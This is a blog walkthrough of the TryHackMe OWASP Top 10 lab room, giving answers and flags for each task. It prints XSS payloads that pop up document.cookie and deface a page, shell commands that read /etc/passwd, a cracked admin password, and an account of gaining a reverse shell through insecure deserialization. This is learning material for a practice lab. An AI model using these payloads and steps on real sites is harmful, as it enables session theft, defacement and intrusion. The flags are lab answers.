Search

Tryhackme -OWASP Top 10 25/09/2021

Updated: Oct 16, 2021


Command Injection What strange text file is in the website root directory?

A strange text file in the website root directory: I used < ls > to see the directory list




drpepper.txt 

is a strange text file.

How many non-root/non-service/non-daemon users are there?

We can use the command:


cat /etc/passwd | cut -d: -f1 i

It will show just first word of each line,

I more detail about command check this link.: LinuxHandBook

0

What user is this app running as?

The user of the app:

whoami or id command will help to find info

The answer for this is

www-data

What is the user's shell set as?

I used id to find the user id. Which is 33. id prints the current user-id and group-id.


And then I used cat /etc/passwd/ to print all the list of user information.

or you can just use


cat /etc/passwd

It will show everything inside passwd file, and we already know what the username is.

/usr/sbin/nologin.

What version of Ubuntu is running?

This command prints Os version.


cat /etc/os-release

can print comprehensive information on the Operating System.

or you can just use



lsb_release -a

Here we see the version as

18.04.4.



Print out the MOTD. What favorite beverage is shown?







Dr Pepper 


Broken Authentication



What is the flag that you found in darren's account?


fe86079416a21a3c99937fea8874b667

What is the flag that you found in arthur's account?

d9ac0f7db4fda460ac3edeb75d75e16e

Sensitive Data Exposure



What is the name of the mentioned directory?


Click on Login link. then inspect webpage, it will show info about webpage. There we could see what is mentioned.



/assets


DB File:



As I knew there is a directory inside the website "/assets". I just added that to URL. in there I could see webapp.db, a database file.


Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

webapp.db





Sensitive Data:


Just click on "webapp.db" and save it. Just for future use.


we can open this with sqlite3 and check what it has.


I never had worked with SQL before, so word of advice, remember "; " at the end of each command. Otherwise, SQL thinks you still have something to add in command.


Use the supporting material to access the sensitive data. What is the password hash of the admin user?



6eea9b7ef19179a06954edd0f6c05ceb


Admin Password:

I used the website Crackstation mentioned in the given material to crack the password hash.



Its clear that its whole first line of qwerty keyboard.


Crack the hash.

What is the admin's plaintext password?



qwertyuiop


Admin Flag:


Login as the admin. What is the flag?


THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}


XML External Entity

[Severity 4 XML External Entity - eXtensible Markup Language


Full form of XML


Extensible Markup Language

Is it compulsory to have XML prolog in XML documents?


no

Can we validate XML documents against a schema?


yes

How can we specify XML version and encoding in XML document?



XML prolog

[Severity 4] XML External Entity - DTD

How do you define a new ELEMENT?


!ELEMENT

How do you define a ROOT element?


!DOCTYPE

How do you define a new ENTITY?


!ENTITY

[Severity 4] XML External Entity - Exploiting


What is the name of the user in /etc/passwd


falcon

Where is falcon's SSH key located?


/home/falcon/.ssh/id_rsa

What are the first 18 characters for falcon's private key


MIIEogIBAAKCAQEA7

Broken Access Control

[Severity 5] Broken Access Control (IDOR Challenge)


Look at other users notes. What is the flag?



flag{fivefourthree}

[Severity 6] Security Misconfiguration


Hack into the webapp, and find the flag!



thm{4b9513968fd564a87b28aa1f9d672e17}

Cross-site Scripting

[Severity 7] Cross-site Scripting


Navigate to http://Machine/ in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello".


<script>alert("Hello World")</script>

ThereIsMoreToXSSThanYouiThink

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.


I copied XSS script from this link and edited it after my need "https://github.com/payloadbox/xss-payload-list"



ReflectiveXss4TheWin

'`"><\x00script>javascript:alert("window.location.hostname")</script>

Now navigate to http://10.10.*.*/ in your browser and click on the "Stored XSS" tab on the navbar; make an account.

Then add a comment and see if you can insert some of your own HTML.



HTML_T4gs

On the same page, create an alert popup box appear on the page with your document cookies.


W3LL_D0N3_LVL2

"><s"%2b"cript>alert(document.cookie)</script>



this script will print out document.cookie and at the end prints out answer in comment field.


you can also use


test" onmouseover="alert(document.cookie)"

to get your answer,


Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.


<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

websites_can_be_easily_defaced_with_xss

Insecure Deserialization

[Severity 8] Insecure Deserialization

Who developed the Tomcat application?


The Apache Software Foundation

What type of attack that crashes services can be performed with insecure deserialization?


Denial of Service

[Severity 8] Insecure Deserialization - Deserialization


Select the correct term of the following statement:

if a dog was sleeping, would this be:

A) A State <-- data, in this case, dogs food can be a state, B) A Behaviour <-- action, dog eating food is a behavior.


A Behavior

[Severity 8] Insecure Deserialization - Deserialization


What is the name of the base-2 formatting that data is sent across a network as?


binary


[Severity 8] Insecure Deserialization - Cookies


If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?


webapp.com/login

What is the acronym for the web technology that Secure cookies work over?


HTTPS

[Severity 8] Insecure Deserialization - Cookies Practical


1st flag (cookie value)


frist flag is inside cookies, only thing needed is to decode that base64 code.




2nd flag (admin dashboard)



and change http://ip into http://ip/admin this will show your flag on admin page.


THM{heres_the_admin_flag} 

[Severity 8] Insecure Deserialization - Code Execution





downloaded the script from the link and changed according to my VPN need.



copied 64base value and added to cookies value inside Inspected elemet/ encodedpayload



I had already open listening with netcat on port 4444,

after I reloaded the page on the website I got connected to the Terminal "Shell" of the website.


After that flag.txt file is not difficult to find



after searching around on terminal, at last, I found it.


Answer:


4a69a7ff9fd68

[Severity 9] Components With Known Vulnerabilities - Lab


How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)




We need an "RCE", and the last one might work.


locate it with locate command.



This shows absolut path to file. just copy that to you documents and run it



test the script to see what you need to execute the script. It seems like I only need a URL.



there we go and we are in.



There is Answer.


1611


[Severity 10] Insufficient Logging and Monitoring


What IP address is the attacker using?


49.99.13.16

What kind of attack is being carried out?


brute force



505 views0 comments